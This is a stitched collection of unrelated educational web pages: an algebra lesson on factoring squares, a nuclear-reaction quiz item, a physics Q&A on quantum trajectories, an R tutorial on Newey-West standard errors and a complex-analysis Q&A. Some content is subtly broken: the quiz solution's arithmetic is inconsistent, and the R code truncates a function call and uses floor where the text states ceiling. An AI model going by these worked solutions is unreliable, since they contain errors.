This trinomial has two squared terms, $x^2$ and $144\text{.}$ These terms are $a^2$ and $b^2\text{,}$ so $a=x$ and $b=12\text{.}$ We check whether the middle term is equal to $2ab\text{.}$
\begin{equation*} 2ab=2(x)(12) = 24x \end{equation*}
This is the correct middle term, so our trinomial has the form (1), with $a=x$ and $b=12\text{.}$ Thus,
\begin{align*} a^2+2ab+b^2 \amp = (a+b)^2 \amp \amp \blert{\text{Replace}~a~\text{by}~x~\text{and}~b~ \text{by}~12.}\\ x^2+24x+144 \amp = (x+12)^2 \end{align*}
###### 5.
How can we factor $a^2- 2ab + b^2\text{?}$
###### 6.
How can we factor $a^2- b^2\text{?}$
###### Caution7.36.
The sum of two squares, $a^2+b^2\text{,}$ cannot be factored! For example,
\begin{equation*} x^2+16,~~~~~~9x^2+4y^2,~~~~~~\text{and}~~~~~~25y^4+w^4 \end{equation*}
cannot be factored. You can check, for instance, that $x^2+16 \not= (x+4)(x+4)\text{.}$
###### Sum of Two Squares.
The sum of two squares, $~a^2+b^2~\text{,}$ cannot be factored.
As always when factoring, we should check first for common factors.
###### Example7.37.
Factor completely $~98-28x^4+2x^8$
Solution
Each term has a factor of 2, so we begin by factoring out 2.
\begin{equation*} 98-28x^4+2x^8 = 2(49-14x^4+x^8) \end{equation*}
The polynomial in parentheses has the form $(a-b)^2\text{,}$ with $a=7$ and $b=x^4\text{.}$ The middle term is
\begin{equation*} -2ab=-2(7)(x^4) \end{equation*}
We use equation (2) to write
\begin{align*} a^2+2ab+b^2 \amp = (a-b)^2 \amp \amp \blert{\text{Replace}~a~\text{by}~7~\text{and}~b~ \text{by}~x^4.}\\ 49-14x^4+x^8 \amp = (7-x^4)^2 \end{align*}
Thus,
\begin{equation*} 98-28x^4+2x^8 = 2(7-x^4)^2 \end{equation*}
###### 7.
What expression involving squares cannot be factored??
### SubsectionSkills Warm-Up
#### ExercisesExercises
Express each product as a polynomial.
###### 1.
$(z-3)^2$
###### 2.
$(x+4)^2$
###### 3.
$(3a+5)^2$
###### 4.
$(2b-7)^2$
###### 5.
$(2n-5)(2n+5)$
###### 6.
$(4m+9)(4m-9)$
### ExercisesHomework 7.4
###### 1.
Square each monomial.
1. $(8t^4)^2$
2. $(-12a^2)^2$
3. $(10h^2k)^2$
###### 2.
Find a monomial whose square is given.
1. $16b^{16}$
2. $121z^{22}$
3. $36p^6q^{24}$
For Problems 3–4, write the area of the square in two different ways:
1. as the sum of four smaller areas,
2. as one large square, using the formula Area = (length)$^2\text{.}$
###### 4.
For Problems 5–7, compute the product.
###### 5.
$(n+1)(n+1)$
###### 6.
$(m-9)(m-9)$
###### 7.
$(2b+5c)(2b+5c)$
For Problems 8–13, compute the product.
###### 8.
$(x+1)^2$
###### 9.
$(2x-3)^2$
###### 10.
$(5x+2y)^2$
###### 11.
$(3a+b)^2$
###### 12.
$(7b^3-6)^2$
###### 13.
$(2h+5k^4)^2$
For Problems 14–19, use the formula for difference of two squares to multiply.
###### 14.
$(x-4)(x+4)$
###### 15.
$(x+5z)(x-5z)$
###### 16.
$(2x-3)(2x+3)$
###### 17.
$(3p-4)(3p+4)$
###### 18.
$(2x^2-1)(2x^2+1)$
###### 19.
$(h^2+7t)(h^2-7t)$
###### 20.
$-2a(3a-5)^2$
###### 21.
$4x^2(2x+6y)^2$
###### 22.
$5mp^2(2m^2-p)(2m^2+p)$
For Problems 23–25, factor the squares of binomials.
###### 23.
$y^2+6y+9$
###### 24.
$m^2-30m+225$
###### 25.
$a^6-4a^3b+4b^2$
For Problems 26–31, factor.
###### 26.
$z^2-64$
###### 27.
$1-g^2$
###### 28.
$-225+a^2$
###### 29.
$x^2-9$
###### 30.
$36-a^2b^2$
###### 31.
$64y^2-49x^2$
For Problems 32–40, factor completely.
###### 32.
$a^4+10a^2+25$
###### 33.
$36y^8-49$
###### 34.
$16x^6-9y^4$
###### 35.
$3a^2-75$
###### 36.
$2a^3-12a^2+18a$
###### 37.
$9x^7-81x^3$
###### 38.
$12h^2+3k^6$
###### 39.
$81x^8-y^4$
###### 40.
$162a^4b^8-2a^8$
###### 41.
Is $x-3)^2$ equivalent to $x^2-3^2\text{?}$ Explain why or why not, and give a numerical example to justify your answer.
###### 42.
Use areas to explain why the figure illustrates the product $(a+b)^2 = a^2+2ab+b^2.$
###### 43.
Use evaluation to decide whether the two expressions $(a+b)^2$ and $a^2+b^2$ are equivalent.
$a$ $b$ $a+b$ $(a+b)^2$ $a^2$ $b^2$ $a^2+b^2$ $2$ $3$ $\hphantom{0000}$ $\hphantom{0000}$ $\hphantom{0000}$ $\hphantom{0000}$ $\hphantom{0000}$ $-2$ $-3$ $\hphantom{0000}$ $\hphantom{0000}$ $\hphantom{0000}$ $\hphantom{0000}$ $\hphantom{0000}$ $2$ $-3$ $\hphantom{0000}$ $\hphantom{0000}$ $\hphantom{0000}$ $\hphantom{0000}$ $\hphantom{0000}$
###### 44.
Explain why you can factor $x^2-4\text{,}$ but you cannot factor $x^2+4\text{.}$
###### 45.
1. Expand $(a-b)^3$ by multiplying.
2. Use your formula from part (a) to expand $(2x-3)^3$
3. Substitute $a=5$ and $b=2$ to show that $(a-b)^3$ is not equivalent to $a^3-b^3\text{.}$
###### 46.
1. Multiply $(a+b)(a^2-ab+b^2)\text{.}$
2. Factor $a^3+b^3$
3. Factor $x^3+8\text{.}$
|
|
# Help:Contents
Jump to: navigation, search
Making a list is as simple as this, just look at the edit
• First level
• second level
• third level
Help starting a new page
Getting technical now $\sqrt{1-e^2}$
|
|
Browse Questions
# The nuclear reaction $\;n + _{5}^{10}B \to _{3}^{7}{Li}+_{2}^{4}He\;$ is observed to occur when very slow - moving neutrons $\;(M_{n}=1.0087 u)\;$ strike a boron atom at rest . For a particular reaction in which $\;K_{n} \approx 0\;,$ the helium $\;(M_{He}=4.0026 u)\;$ is observed to have a speed of $\;9.30\times 10^{6} m/s\;.$ Then the kinetic energy of $\;(lithium\;M_{li}=7.016 u)\;$. Find Q value of reaction .
$(a)\;1.42 MeV\qquad(b)\;3 MeV\qquad(c)\;2 MeV\qquad(d)\;2.82 MeV$
Answer : (d) $\;2.82 MeV$
Explanation :
We are given $\; K_{\alpha}=K_{\lambda}=0$
So $\;Q=K_{Li}+K_{He}$
Where $\;K_{He}=\large\frac{1}{2}\;M_{He}v_{He}^{2}=\large\frac{1}{2}\;(4.0026 u)\;(1.66\times10^{-27} Kg/u)\times(9.30\times10^{6} m/s)^2$
$=2.87 \times 10^{-13} J =1.8 MeV$
Hence $\;Q=1.02 MeV + 1.8 MeV = 2.82 MeV\;.$
|
|
# What does it mean “not to have a definite trajectory”?
In a comment to my question someone stated the following:
"photons do not travel at some definite number of oscillations per second. In fact, they do not "travel" at all, no more than electrons or other quanta do, as by the Uncertainty Principle they don't have a definite speed and/or trajectory"
Nobody objected or denied it, can someone explain what that actually means?
• Does it mean that they do not have a definite/straight/regular trajectory and they wander erratically or that they have none at all? Can you try to graphically describe their motion ?
It is generally thought that QM describes weird things, laws and phenomena that are quite different from macroscopic world, can you be precise about one feature, please, i.e if it respects the basic old tenet "Natura non facit saltus":
• Does QM allow a particle to disappear from a point and reappear in another point that is not continuous to it? If so, what is the explanation?
A photon is a name given to a lump in an electromagnetic field that can cause a single electron to change from one energy level to another. The size of the lump in a given region tells you the probability that it will make an electron change its energy level. The first thing to note about such a lump is that it doesn't have a single location. Rather, it is spread over an extended region. Now, it can be the case that if you track the evolution of the field over time, a lump in some region R1 can give rise to another lump in some other region R2. But you can't pick a particular point x1 in R1 and say that the field at x1 gave rise to the field at a point x2 in R2. Rather, the lump in R1 gave rise to the lump in R2. If you change the shape of the lump in R1 away from x1 this will in general change the probability of observing something in a sub region of R2 around x2. So you can't say the photon travels along some trajectory from x1 to x2.
And what I have said above is only an approximation because in general you can't localise a field so that it only has a non-zero value in some bounded region. The best you can do is change the field so that you will have a higher probability of seeing a photon in some region.
The above discussion alone would mean that a photon doesn't have a trajectory, but in general the situation is even less trajectory friendly than that. Different photons with the same energy aren't distinguishable: all you can say is "there are so many lumps in the field in this region". If you have some region R3 at t2 and there are lumps in R1 and R2 at t1 both of which are within (t2-t1)/c of R3, then there is in general no fact of the matter about whether the lump at R3 corresponds to the lump at R1 or R2 since they both contribute to R3 and all you can measure is something like the number of lumps.
If you want to understand this issue properly you should read about quantum field theory. A good book about QFT is "Quantum field theory for the gifted amateur" by Lancaster and Blundell.
More explanation. The OP asks if the particle can be in two places at once. Suppose that the field in a particular region is such that you have a very high probability of only measuring one particle in some given period of time. In general you will not be able to explain the results of experiments in that region by saying the particle has gone down one particular trajectory. Changes in different places in that region will all change the final outcome of the experiment. You could say the particle is in more than one place at a time in that sense. The particle doesn't appear or disappear from one place or another in the region. Rather, the field changes gradually over time so that the particle changes its probability of being in different places.
• The electron in H ground state is everywhere at a given t? if not, if it does indeedmove, how does it move without a trajectory? can it be in two places at one time? can it disappear in one place and reappear in another place skipping, space-points in-between according to QM? This is the question – user104372 Feb 17 '16 at 12:14
• "Lump mechanics"? I like it! :-) – CuriousOne Feb 17 '16 at 12:25
• @user104 see the explanation in the paragraph added in the answer above – alanf Feb 17 '16 at 12:45
• So could we say that a laser forms a line of lumps, the first lumps forming right next to the device itself causing subsequent lumps to be formed next to the first lumps and so on? And the lumps propogate at the speed of light? And when the laser is switched off the lumps collapse starting at the laser end and the collapsing happens at the speed of light? – Todd Wilcox Feb 17 '16 at 17:30
• No. The laser forms a field, which when measured or interacted with in a certain way looks like lumps. To say the laser beam is made of lumps is a bit like looking at an object at an angle and saying that the object is made out of all the ways you can look at it at an angle. – alanf Feb 17 '16 at 23:19
It means that quanta are not "bodies" in the sense of classical mechanics. Let's review the necessary definitions:
A "body" is defined as an extended piece of matter.
A "particle" is the approximation that a body can be described by the motion of its center of mass, so that we don't have to care about either size, shape or composition of the body.
A "trajectory" is the time dependent position vector of that center of mass.
Quanta (like photons and electrons) are neither bodies nor particles in this sense (because they don't behave like either) and they do not have trajectories.
Now, one can analyze quantum mechanics in terms of "paths", but those are not the paths that you keep hearing about when people are poorly discussing things like the double slit experiment. Instead, one can reformulate the Schroedinger equation (and the equations of quantum field theory) into an integral formulation, where the propagator can be described by a so called "path integral". This path integral is the summation of the complex exponential of the classical action S over all possible geometric paths that connect the initial to the final state.
The path integral is a pretty hard to use mathematical formalism if one attacks it directly, but it can be expressed as a perturbation series... those are the Feynman diagrams that you may have seen.
So what are quanta then, you may ask?
A quantum is the smallest unit of measurement on a quantum field. No matter what we do to that field, it will never interact in any other way than by exchanging a quantum with us.
Practically this means that we can initialize a quantum field with a finite number of quanta at the beginning of an experiment and we can measure a finite number of quanta at the end of it. The initial state is a configuration of quanta and the final state is a configuration of quanta. The dynamical theory of the field tells us what the probability distributions for final configurations of quanta will be when we keep repeating the same experiment over and over, again. Whatever we do, though, we can not assume that the quanta we put in have travelled on some paths from the initial state to the quanta of the final state.
Why is that so? Because in quantum field theory the number of quanta is simply not a constant and even if it was, quanta are not distinguishable. We can't label them Q1, Q2, Q3 and expect to see three labeled quanta to come out at the end. Instead nature can make some of them disappear or add some. More importantly, though, all the propagation of identical quanta will follow either the symmetry of bosons (i.e. only wave functions that are fully symmetric in all bosons appear) or fermions, which means that all wave functions have to be antisymmetric in the fermionic quanta.
So why do we see all this talk about "particles" in quantum mechanics? Because (beginners level) quantum mechanics is really a non-relativistic single quantum theory. It avoids all the mathematical problems with relativistic quantum field theory and can make reasonable statements about system with low energy bound states and low energy scattering. We don't have to worry about ever seeing more or less quanta than we have put in and it pretends to have a simple interpretation in terms of "particles". That, unfortunately, is somewhat of a mirage and it actually pays not to waste any effort on trying to reach the promised oasis of an interpretation of quantum theory where "particles" more on well defined "paths". That is (and always was) a nonsensical misunderstanding/misstatement of the theory that stems from its beginnings in the 1900s-1920s. By 1930 physicists had understood that single particle quantum mechanics was not sufficient to describe nature and by the late 1940s quantum field theory was blooming. At that point, latest, one should have stopped using the wrong concepts even in non-relativistic quantum mechanics. For whatever reason (probably because it seems to be easier to teach it that way) inertia has won out and students are still too often being forced to learn one version of QM first, before they basically have to re-learn the same thing, again, this time with the proper concepts. Those who never reach the level of even rudimentary understanding of relativistic fields are stuck with the wrong mental picture about quanta and particles.
To answer your questions directly: quanta don't have trajectories and it does not make sense to try to define any for them. "Particles" don't disappear and they do not reappear. What high energy physicists call "particles" are high momentum states that are being subjected to weak position measurements in particle detectors. It can be shown that under these circumstances reasonably straight "tracks" (not paths!) will appear in detectors. QM textbooks may glance over the phenomenological difference by showing particle tracks without explaining that a particle detector never even comes close to probing the quantum regime for the momentum/position uncertainty. What these detectors are built for are charge, momentum/energy and mass measurements (occasionally also for spin), but they are essentially classical devices.
• Could I get some feedback from the downvoter what is technically false about this description? I am really curious. – CuriousOne Feb 17 '16 at 11:31
• In the usual interpretation, an electron/photon is not a quantum. The measured quantities characterizing a system - i.e. the observables - may (but not always) have quantized (discrete) numerical values. The "fundamental" (in the right scale) constituents of a quantum system may be described mathematically by some suitable set of observables and/or fields (that are observables as well), but the interpretation of them is still of (more or less) tangible objects. – yuggib Feb 17 '16 at 11:36
• As far as I know, the word quanta have been introduced to describe the discreteness of the spectrum of some observables (already in non-relativistic QM), and not to refer to the fundamental constituents of the system under examination. – yuggib Feb 17 '16 at 11:37
• @yuggib: If by "usual interpretation" you mean the technically incorrect explanation of quantum mechanics that you can find in so many textbooks, then you are correct. That shouldn't stop us from giving the OP the correct explanation, instead. Falsehoods have no protection because of their popularity. The only way for quantum systems to interact (and to exist in the first place) is by means of quantum fields. There is nothing else. – CuriousOne Feb 17 '16 at 11:38
• It is just a matter of terminology, but an important one. I agree that you need to introduce the quantum fields to describe relativistic quantum mechanics. But "quantum" means a definite discrete quantity (as opposed to the continuum), and it is related to the spectral behavior of some observables rather than to particles. "Particle" come from the latin word for tiny object, and so is more suitable to define the fundamental constituent of a physical system. Again, I agree that in relativistic quantum mechanics this constituent is described by an operator (the field) rather than... – yuggib Feb 17 '16 at 11:43
tl,dr: This is really just a verbous synthesis of what has already been said by alanf and CuriousOne with a more basic experiment and theory explanation approach and a smattering of my own limited knowledge.
The upshot is the same: trajectories make little sense in nonrelativistic QM and if you factor in QFT, you can't even speak about particles.
The problem here is that our intuition is ill-defined when it comes to quantum mechanics. In particular, a "particle" is ill-defined. A second problem is that there are two sides to this question: theory and experiments - and another problem is that quantum experiments are much more difficult on a fundamental level.
Experimental Trajectories
Let's start with experiments (one should always start there, right?) and suppose we know what a "particle" is. Now, for classical physics, we can all agree that a body has a nice trajectory like a football shot on a goal. When you ask people whether quantum particles have trajectories, they will point to bubble chamber trajectories and violà, there are clear particle trajectories. Or they might point you to particle accelerators, where particle trajectories are visualised. As mentioned in another answer, the trouble is that the quantum particles here have very high energy. If the amount of energy involved is very high, the particle, albeit tiny, will behave classically where we are concerned about.
Thus, in order to see the "true" quantum world, this won't do. You'll have to think of low energy particles - maybe electrons in an atom or such. When you want to look at the "trajectory" of such a particle, you'll already be in trouble: you can't just shine light at it and watch it move - any photon with a moderately high energy will just ionize the atom and completely change whatever "trajectory" you wanted to look at. And even if you don't ionize the atom, you'll still heavily influence the path. If you want to "watch" a photon, you could use photo-detectors to measure the exact place where the photon is - but afterwards, it'll be destroyed, so that's also no good to measuring a trajectory.
First lesson: What you can do is already limited to one measurement of position or momentum. Everything after that just won't make much sense any more.
From Experiment to Theory
Now you might be clever and think: I can just set up an experiment, where I sent an electron time and time again and if I keep everything else fixed, every electron will have the exact same trajectory (this is what we expect from classical physics) and then I can just measure the trajectory by measuring speed and/or position at different places.
This is where the Heisenberg uncertainty jumps in and tells you that the result will never be a single trajectory. However hard you try, there will be a fundamental distribution of the results. If you measure "one" trajectory (meaning you prepare an electron, measure its position after time $t_1$, then reprepare, measure after $t_2$ and so on), you'd get an eratic behaviour. If you repeat the measurements at every point, you'd get a distribution of results. This is one way to say "particles don't have a trajectory".
Second Lesson: Repeating an experiment won't help - the outcome will be a probabilistic trajectory, not something you'd normally call a "trajectory".
However, what you can observe is how motion is built up: The probability of where to find the particle changes over time as does the speed. If you think you are sending a particle along some linear trajectory, what you will observe if done right is that the particle will "probably" move along this trajectory.
Nonrelativistic Quantum Mechanics
You can even go further: If you look into quantum mechanics (which can perfectly describe anything I have just talked about), in the scenario of an electron moving along some path* we have Ehrenfest's theorem, which tells us that the expectation value of position and momentum behave like a classical particle in classical mechanics: the expectation value has a classical trajectory! Note however that since the probability distributions are not very sharp, we cannot say the same for a single particle.
In nonrelativistic quantum mechanics, people tend to interpret this (and some other results together) as meaning that no particle really has a well-defined position and/or momentum. For large momenta (i.e. large energies) or large particles this doesn't really matter because the probability distributions become very sharp, but for our electron at low speed it does. This doesn't mean that the position is just a bit uncertain, it means that asking for a position of a particle when you don't measure it doesn't make sense. Note that this is a theoretical statement. If you don't measure, you can't really say anything, but using measurements you can rule out simple theories where a position and momentum are well-defined.
Third lesson: Mostly, people interpret quantum theory to imply that drawing the movement of a particle doesn't make sense. The particle moves neither along an eratic, nor a straight trajectory and it also doesn't magically disappear at a point and reappear at another. The question "How does the movement look like" just doesn't make sense (and you will always fail when you answer it experimentally).
Can we get around this?
Yes. Bohmian mechanics, a different yet equivalent interpretation of nonrelativistic quantum mechanics assigns each particle a position and a trajectory "pilot wave". This trajectory uses hidden variables (i.e. variables which we have no experimental access to). Note that the predictions of Bohmian mechanics and canonical quantum mechanics are the same, it is (so far) only a reinterpretation of the theory.
However, let me warn you: Bohmian mechanics has many problems of its own, not least that (as of now) it cannot really make sense out of QFT.
More theory and philosophy
I have always talked about particles and nonrelativistic quantum field theory. As pointed out by other answers here, the story gets even more complicated with QFT (from the classical intuition - it actually gets simpler in a certain way).
You seem to believe that there are particles and a massive particle must of course have a place where you can find it. There is a rest frame for the particle, so I could just go and have a look at it. Sadly, that's not quite true. The fundamental objects in quantum field theory are not particles, they are fields and their excitations. The connection to experiments is the rule that a quantity in an experiment corresponds to a self-adjoint operator and the values that the experiment will give are elements of the spectrum of that operator. Quantum fields have a ground state and every other possible state is an excited state. Very often, the results of the measurement are discrete ("quanta") and therefore, so are the excitations. Often, people therefore call these excitations "particles". The excitation of the electromagnetic field is a "photon" and there are quantum fields where the excitation is an "electron". However, we have a problem: These "particles" are not really what we think of as particles. They might not be localised - i.e. they really don't need to have a "position", i.e. if you look at the values of the field everywhere, it might be that the excitation is very spread out and there is no place where you could really say "Here is the particle". They might be somewhat localised and look like "lumps" or they might not be. In a sense, the orbital of an atom is a visualisation of the electron-excitation. And looking at such an orbital, I wouldn't really call it a particle, because - well for one, because it doesn't have a well-defined position.
And this is a basic problem of quantum field theory: Excitations are rarely localised. Talking about particles as localised objects with definite properties will only ever (partially) make sense in the absence of interaction. There are mathematical results to back this up (see this entry in the Stanford encyclopedia to learn more about the ontology of QFT).
Last lesson: In other words: Since we can't even define particles (localised objects), we don't even have to care how they move from point to point or how their trajectory looks like - none of these questions has meaning. The only thing that we can talk about is the probability density corresponding to observables with respect to quantum fields. We can ask how they evolve (this is answered by QFT) and we can have a look at asymptotic behaviour and how classicality emerges.
Last but not least: In the LHC experiments alluded to earlier, we can now say a bit more: After the collision, we have a bunch of excitations with a very high energy. They are already in the asymptotic regime: the detectors interact only weakly with those particles and therefore they behave very much like particles. Since in addition their energy is quite high, their probability densities are very sharp so that you really do behave like a particle trajectory. The interesting part of course is the collision - where the interaction is certainly not small. At that point, we cannot make sense of the words "particle".
*(see how intuition dictates how I have to write this sentence? I'm trying to explain that the sentence doesn't quite make sense, yet have to write it down to explain the scenario...)
• It's implied but I think it should be made clear that at the point of collision is perhaps the only place where we can definitely say: here the particle was - interactions such as collisions collapse the probabilities to a definite point in space – slebetman Feb 17 '16 at 19:17
Yes, also check out Bell's Theorem which is brilliantly described in Brian Greene's "The Fabric of the Cosmos". In the case of a single stream of photons being beamed one at a time, they make a wave-like pattern. Each individual particle is a wave -- that's why they don't have a definite trajectory. In fact, you can't think of any single quanta (particle) as being in a specific location.... It's not because we can't know the location or because it might be in some other location... in fact, there is no specific location in space-time where a particle "is", until the effects of an interaction propegate which show the particle at one specific trajectory where that particle "could have been". It is in quotes because Bell's experiments demonstrate that the particle really was in an Eigenstate (a fancy way of saying it is in more than one place) -- right up until the "decoherence" when we can prove that it interacted with other particles from a specific location.
• My question refers to electrons, and they do have mass, so.. they must occupy space, and only one space at a time, and they should pass from one point to the next and only to a next point. They do progress like a wave, but a wave is indeed a trajectory , too – user104372 Feb 17 '16 at 15:29
• @user104: Think of it this way - until an electron interacts with another "thing" (usually this is called "observed") it doesn't occupy a definite space but rather a statistical/probabilistic range of space. That a single electron can cause interference with itself tells us that the probabilities does not mean we don't know (like the outcome of a dice), it means it actually occupy all the space according to the probabilities (like multiple virtual particles travelling together). – slebetman Feb 17 '16 at 19:10
• @user104 "x has mass, so x must occupy (behave as if it occupies) a particular single point in space and pass from one point to the next" is simply not true, on small scales our reality behaves in ways that contradict this. Electron "orbits" around atoms are a great example. In many cases, the concept of a trajectory is a very useful simplification but not always - the meaning of "x does not have a definite trajectory" is "as some cases show, the whole concept that 'stuff' or 'mass' has 'location' or 'trajectory' is conceptually wrong and not consistent with the physical reality we live in". – Peteris Feb 18 '16 at 1:55
• "they do have mass, so.. they must occupy space, and only one space at a time" - that makes sense but experiments show that it's wrong. – emery Feb 19 '16 at 15:04
## protected by Qmechanic♦Feb 17 '16 at 15:42
Thank you for your interest in this question. Because it has attracted low-quality or spam answers that had to be removed, posting an answer now requires 10 reputation on this site (the association bonus does not count).
|
|
This book is in Open Review. We want your feedback to make the book better for you and other students. You may annotate some text by selecting it with the cursor and then click the on the pop-up menu. You can also see the annotations of others: click the in the upper right hand corner of the page
## 15.4 HAC Standard Errors
The error term $u_t$ in the distributed lag model (15.2) may be serially correlated due to serially correlated determinants of $Y_t$ that are not included as regressors. When these factors are not correlated with the regressors included in the model, serially correlated errors do not violate the assumption of exogeneity such that the OLS estimator remains unbiased and consistent.
However, autocorrelated standard errors render the usual homoskedasticity-only and heteroskedasticity-robust standard errors invalid and may cause misleading inference. HAC errors are a remedy.
### HAC Standard errors
Problem:
If the error term $u_t$ in the distributed lag model (15.2) is serially correlated, statistical inference that rests on usual (heteroskedasticity-robust) standard errors can be strongly misleading.
Solution:
Heteroskedasticity- and autocorrelation-consistent (HAC) estimators of the variance-covariance matrix circumvent this issue. There are R functions like vcovHAC() from the package sandwich which are convenient for computation of such estimators.
The package sandwich also contains the function NeweyWest(), an implementation of the HAC variance-covariance estimator proposed by Newey and West (1987).
Consider the distributed lag regression model with no lags and a single regressor $X_t$ \begin{align*} Y_t = \beta_0 + \beta_1 X_t + u_t. \end{align*} with autocorrelated errors. A brief derivation of \begin{align} \overset{\sim}{\sigma}^2_{\widehat{\beta}_1} = \widehat{\sigma}^2_{\widehat{\beta}_1} \widehat{f}_t \tag{15.4} \end{align} the so-called Newey-West variance estimator for the variance of the OLS estimator of $\beta_1$ is presented in Chapter 15.4 of the book. $\widehat{\sigma}^2_{\widehat{\beta}_1}$ in (15.4) is the heteroskedasticity-robust variance estimate of $\widehat{\beta}_1$ and \begin{align} \widehat{f}_t = 1 + 2 \sum_{j=1}^{m-1} \left(\frac{m-j}{m}\right) \overset{\sim}{\rho}_j \tag{15.5} \end{align} is a correction factor that adjusts for serially correlated errors and involves estimates of $m-1$ autocorrelation coefficients $\overset{\sim}{\rho}_j$. As it turns out, using the sample autocorrelation as implemented in acf() to estimate the autocorrelation coefficients renders (15.4) inconsistent, see pp. 650-651 of the book for a detailed argument. Therefore, we use a somewhat different estimator. For a time series $X$ we have $\ \overset{\sim}{\rho}_j = \frac{\sum_{t=j+1}^T \hat v_t \hat v_{t-j}}{\sum_{t=1}^T \hat v_t^2}, \ \text{with} \ \hat v= (X_t-\overline{X}) \hat u_t.$ We implement this estimator in the function acf_c() below.
$m$ in (15.5) is a truncation parameter to be chosen. A rule of thumb for choosing $m$ is \begin{align} m = \left \lceil{0.75 \cdot T^{1/3}}\right\rceil. \tag{15.6} \end{align}
We simulate a time series that, as stated above, follows a distributed lag model with autocorrelated errors and then show how to compute the Newey-West HAC estimate of $SE(\widehat{\beta}_1)$ using R. This is done via two separate but, as we will see, identical approaches: at first we follow the derivation presented in the book step-by-step and compute the estimate “manually”. We then show that the result is exactly the estimate obtained when using the function NeweyWest().
# function that computes rho tilde
acf_c <- function(x, j) {
return(
t(x[-c(1:j)]) %*% na.omit(Lag(x, j)) / t(x) %*% x
)
}
# simulate time series with serially correlated errors
set.seed(1)
N <- 100
eps <- arima.sim(n = N, model = list(ma = 0.5))
X <- runif(N, 1, 10)
Y <- 0.5 * X + eps
# compute OLS residuals
res <- lm(Y ~ X)\$res
# compute v
v <- (X - mean(X)) * res
# compute robust estimate of beta_1 variance
var_beta_hat <- 1/N * (1/(N-2) * sum((X - mean(X))^2 * res^2) ) /
(1/N * sum((X - mean(X))^2))^2
# rule of thumb truncation parameter
m <- floor(0.75 * N^(1/3))
# compute correction factor
f_hat_T <- 1 + 2 * sum(
(m - 1:(m-1))/m * sapply(1:(m - 1), function(i) acf_c(x = v, j = i))
)
# compute Newey-West HAC estimate of the standard error
sqrt(var_beta_hat * f_hat_T)
#> [1] 0.04036208
For the code to be reusable in other applications, we use sapply() to estimate the $m-1$ autocorrelations $\overset{\sim}{\rho}_j$.
# Using NeweyWest():
NW_VCOV <- NeweyWest(lm(Y ~ X),
lag = m - 1, prewhite = F,
# compute standard error
sqrt(diag(NW_VCOV))[2]
#> X
#> 0.04036208
By choosing lag = m-1 we ensure that the maximum order of autocorrelations used is $m-1$ — just as in equation (15.5). Notice that we set the arguments prewhite = F and adjust = T to ensure that the formula (15.4) is used and finite sample adjustments are made.
We find that the computed standard errors coincide. Of course, a variance-covariance matrix estimate as computed by NeweyWest() can be supplied as the argument vcov in coeftest() such that HAC $t$-statistics and $p$-values are provided by the latter.
example_mod <- lm(Y ~ X)
coeftest(example_mod, vcov = NW_VCOV)
#>
#> t test of coefficients:
#>
#> Estimate Std. Error t value Pr(>|t|)
#> (Intercept) 0.542310 0.235423 2.3036 0.02336 *
#> X 0.423305 0.040362 10.4877 < 2e-16 ***
#> ---
#> Signif. codes: 0 '***' 0.001 '**' 0.01 '*' 0.05 '.' 0.1 ' ' 1
### References
Newey, Whitney K., and Kenneth D. West. 1987. “A Simple, Positive Semi-Definite, Heteroskedasticity and Autocorrelation Consistent Covariance Matrix.” Econometrica 55 (3): 703–08.
|
|
# If $f$ is entire such that $|f(z)|\leq C|z|^{5/2}$, $f$ is polynomial of degree two.
$$f$$ is entire and there exists $$C>0$$ and $$M>0$$ such that $$|f(z)|\leq C|z|^{5/2}$$ for all $$z\in\mathbb{C}$$ where $$|z|>M$$. Prove that $$f$$ is polynomial of degree two.
I don't have a clear idea but given an entire function and we can bound it $$\dfrac{|f(z)|}{|z|^{5/2}}\leq C$$, and showing that it has removable singularity at $$z=0$$, using Riemann's theorem, I can show that $$\dfrac{f(z)}{z^{5/2}}$$ is a constant by Liouville's theorem. However, I'm not sure what I should do to show that it is intact a polynomial.
• No! $f(z)/z^{5/2}$ is not a holomorphic function in $\Bbb C\setminus\{0\}$. – David C. Ullrich Dec 21 '18 at 18:09
• Cauchy's Estimate – Story123 Dec 21 '18 at 18:54
Almost certainly, the author of this exercise expected you to use Cauchy's estimates: $$\frac{|f^{(n)}(a)|}{n!}\le\frac{\sup_t\{|f(a+re^{it}|)\}}{r^n}$$ for $$r>0$$. Here, then $$\frac{|f^{(n)}(0)|}{n!}\le\frac{Cr^{5/2}}{r^n}$$ for $$r>R$$. If $$n\ge3$$ and we let $$r\to\infty$$ we get $$f^{(n)}(0)=0$$. In the power series $$f(z)=\sum a_nz^n$$ then $$a_3=a_4=\cdots=0$$.
• Two questions. Why are we considering $a+re^{it}$? What is $a$ here? And, how do we get the supremum $Mr^{5/2}$? – Ya G Dec 21 '18 at 20:24
• @YaG That's three questions! $a+re^it$ is the circle, centre $a$ radius $r$. $a=0$ in your problem. The supremum comes from your condition on $f$. – Lord Shark the Unknown Dec 22 '18 at 5:56
Let $$f(z) = \sum_{n=0}^\infty a_n z^n$$, and let $$g(z) = \sum_{k=0}^\infty a_{k+3} z^k$$, so that $$[f(z) - a_0 - a_1 z - a_2 z^2] = z^3 g(z).$$ The function $$g$$ is entire and, by assumption, $$\lim_{|z| \to +\infty} g(z) = 0$$: $$|g(z)| = \frac{|f(z) - a_0 - a_1 z - a_2 z^2|}{|z|^{5/2}} \cdot \frac{1}{|z|^{1/2}} \leq \left(C + \frac{|a_0| + |a_1|\, |z| + |a_2|\, |z|^2}{|z|^{5/2}}\right)\frac{1}{|z|^{1/2}} \to 0.$$ Hence, by Liouville's theorem, we must have $$g = 0$$.
• Would you please explain a little bit more? This does make sense by itself but how did you come up with the $g(z)$ other than the fact that to make a relation to $f(z)$ as you set it up. How is $|z|^{5/2}$ and $C$ used this this case? – Ya G Dec 21 '18 at 18:19
• Added a line in the proof. – Rigel Dec 21 '18 at 18:24
It may be interesting to note this follows from basic facts about Fourier series (Parseval) with more or less no complex analysis. Say $$f(z)=\sum c_nz^n$$. Then $$C^2r^5\ge\frac1{2\pi}\int_0^{2\pi}|f(re^{it})|^2\,dt=\sum_j|c_j|^2r^{2j}\ge|c_n|^2r^{2n};$$hence $$c_n=0$$ for $$n\ge3$$.
• A lot of complex analysis follows from basic facts about Fourier series. – Lord Shark the Unknown Dec 21 '18 at 18:55
Your approach can also be made to work, but you need to show that $$h(z)=\frac{f(z)}{z^3}$$ has a removable singularity at $$z=0$$.
This can be done as follows: Let $$g(z)=\frac{f(z)}{z^2}$$. Then, as $$\lim_{z \to 0}g(z)=0$$, $$g$$ has a removable singularity at $$z=0$$, and if we remove it we have $$g(0)=0$$.
